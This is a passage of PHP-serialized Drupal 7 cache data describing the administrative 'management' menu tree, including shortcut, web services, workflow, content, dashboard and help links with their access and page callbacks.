pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/config/user-interface\";s:5:\"title\";s:14:\"User interface\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:38:\"Tools that enhance the user interface.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:1:{i:201;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"201\";s:4:\"plid\";s:2:\"61\";s:9:\"link_path\";s:36:\"admin/config/user-interface/shortcut\";s:11:\"router_path\";s:36:\"admin/config/user-interface/shortcut\";s:10:\"link_title\";s:9:\"Shortcuts\";s:7:\"options\";s:79:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:29:\"Add and modify shortcut sets.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:38:\"a:1:{i:0;s:20:\"administer shortcuts\";}\";s:13:\"page_callback\";s:18:\"shortcut_set_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:36:\"admin/config/user-interface/shortcut\";s:5:\"title\";s:9:\"Shortcuts\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:29:\"Add and modify shortcut sets.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:3:{i:204;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"204\";s:4:\"plid\";s:3:\"201\";s:9:\"link_path\";s:44:\"admin/config/user-interface/shortcut/add-set\";s:11:\"router_path\";s:44:\"admin/config/user-interface/shortcut/add-set\";s:10:\"link_title\";s:16:\"Add shortcut set\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"204\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:38:\"a:1:{i:0;s:20:\"administer shortcuts\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:39:\"a:1:{i:0;s:21:\"shortcut_set_add_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:36:\"admin/config/user-interface/shortcut\";s:8:\"tab_root\";s:36:\"admin/config/user-interface/shortcut\";s:5:\"title\";s:16:\"Add shortcut set\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:206;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"206\";s:4:\"plid\";s:3:\"201\";s:9:\"link_path\";s:38:\"admin/config/user-interface/shortcut/%\";s:11:\"router_path\";s:38:\"admin/config/user-interface/shortcut/%\";s:10:\"link_title\";s:14:\"Edit shortcuts\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"206\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:14:\"Edit shortcuts\";s:14:\"title_callback\";s:27:\"shortcut_set_title_callback\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:4:{i:208;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"208\";s:4:\"plid\";s:3:\"206\";s:9:\"link_path\";s:47:\"admin/config/user-interface/shortcut/%/add-link\";s:11:\"router_path\";s:47:\"admin/config/user-interface/shortcut/%/add-link\";s:10:\"link_title\";s:12:\"Add shortcut\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"6\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"206\";s:2:\"p6\";s:3:\"208\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:43:\"a:2:{i:0;s:17:\"shortcut_link_add\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:38:\"admin/config/user-interface/shortcut/%\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:12:\"Add shortcut\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:210;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"210\";s:4:\"plid\";s:3:\"206\";s:9:\"link_path\";s:45:\"admin/config/user-interface/shortcut/%/delete\";s:11:\"router_path\";s:45:\"admin/config/user-interface/shortcut/%/delete\";s:10:\"link_title\";s:19:\"Delete shortcut set\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"6\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"206\";s:2:\"p6\";s:3:\"210\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:26:\"shortcut_set_delete_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:50:\"a:2:{i:0;s:24:\"shortcut_set_delete_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:45:\"admin/config/user-interface/shortcut/%/delete\";s:5:\"title\";s:19:\"Delete shortcut set\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:212;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"212\";s:4:\"plid\";s:3:\"206\";s:9:\"link_path\";s:43:\"admin/config/user-interface/shortcut/%/edit\";s:11:\"router_path\";s:43:\"admin/config/user-interface/shortcut/%/edit\";s:10:\"link_title\";s:13:\"Edit set name\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"10\";s:5:\"depth\";s:1:\"6\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"206\";s:2:\"p6\";s:3:\"212\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:2:{i:0;s:22:\"shortcut_set_edit_form\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:38:\"admin/config/user-interface/shortcut/%\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:13:\"Edit set name\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:214;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"214\";s:4:\"plid\";s:3:\"206\";s:9:\"link_path\";s:44:\"admin/config/user-interface/shortcut/%/links\";s:11:\"router_path\";s:44:\"admin/config/user-interface/shortcut/%/links\";s:10:\"link_title\";s:10:\"List links\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"6\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"206\";s:2:\"p6\";s:3:\"214\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:35:\"a:1:{i:4;s:17:\"shortcut_set_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:24:\"shortcut_set_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:4;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:48:\"a:2:{i:0;s:22:\"shortcut_set_customize\";i:1;i:4;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:38:\"admin/config/user-interface/shortcut/%\";s:8:\"tab_root\";s:38:\"admin/config/user-interface/shortcut/%\";s:5:\"title\";s:10:\"List links\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:213;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"213\";s:4:\"plid\";s:3:\"201\";s:9:\"link_path\";s:43:\"admin/config/user-interface/shortcut/link/%\";s:11:\"router_path\";s:43:\"admin/config/user-interface/shortcut/link/%\";s:10:\"link_title\";s:13:\"Edit shortcut\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"5\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"61\";s:2:\"p4\";s:3:\"201\";s:2:\"p5\";s:3:\"213\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:32:\"a:1:{i:5;s:14:\"menu_link_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"shortcut_link_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:5;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:44:\"a:2:{i:0;s:18:\"shortcut_link_edit\";i:1;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:43:\"admin/config/user-interface/shortcut/link/%\";s:5:\"title\";s:13:\"Edit shortcut\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}}i:64;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"64\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/services\";s:11:\"router_path\";s:21:\"admin/config/services\";s:10:\"link_title\";s:12:\"Web services\";s:7:\"options\";s:80:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"Tools related to web services.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"64\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/services\";s:5:\"title\";s:12:\"Web services\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:30:\"Tools related to web services.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:65;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"65\";s:4:\"plid\";s:1:\"8\";s:9:\"link_path\";s:21:\"admin/config/workflow\";s:11:\"router_path\";s:21:\"admin/config/workflow\";s:10:\"link_title\";s:8:\"Workflow\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Content workflow, editorial workflow tools.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:2:\"65\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/config/workflow\";s:5:\"title\";s:8:\"Workflow\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"Content workflow, editorial workflow tools.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site 